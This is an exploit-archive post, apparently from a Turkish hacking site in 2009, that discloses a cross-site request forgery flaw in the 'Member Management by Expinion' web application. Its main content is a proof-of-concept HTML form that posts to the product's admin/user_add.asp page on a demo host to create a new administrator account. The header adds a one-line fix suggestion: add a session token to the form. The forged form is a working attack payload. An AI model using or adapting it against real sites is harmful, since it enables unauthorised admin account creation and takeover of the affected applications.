Member Management by Expinion ~ XSRF Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > Member Management by Expinion ~ XSRF Vuln.

Madde
	Author : Bug Researchers/CWH1RLPOOL
	Date : 13.09.2009 20:24:10
	# Member Management by Expinion ~ XSRF Vuln. [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name :Member Management by Expinion # vulnerable Type : xsrf # Infection : Yeni Bir Admin Eklenebilir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli # author : BUG RESEARCHERS//CWH1RLPOOL ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <form action=http://www.europeum.net/Demos/MMS/admin/user_add.asp method=post name=frm onSubmit=return ValidateUser()> <input style=width: 350; type=Text name=name value= size=40 maxlength=95 class=textbox /> <input style=width: 350; type=Text name=company value= size=40 maxlength=85 class=textbox /> <input style=width: 350; type=Text name=email value= size=40 maxlength=75 class=textbox /> <input style=width: 290; type=Text name=username value= size=30 maxlength=25 class=textbox /> <input style=width: 290; type=Text name=password value= size=30 maxlength=25 class=textbox /> <input style=’width: 350px;’ type=’Text’ value=’Admin can add custom fields like this one, the checkbox below, or the My Form field.’ name=’1’ class=’textbox’> <input style=’’ type=’Checkbox’ value=’I agree to the terms and conditions.’ name=’4’ class=’’> <input style=width: 100%; type=Text name=units value=0 size=40 maxlength=5 class=textbox /> <input type=Checkbox name=active checked value=1 /> <img src= images/caution.gif> < -- bug code end of -- >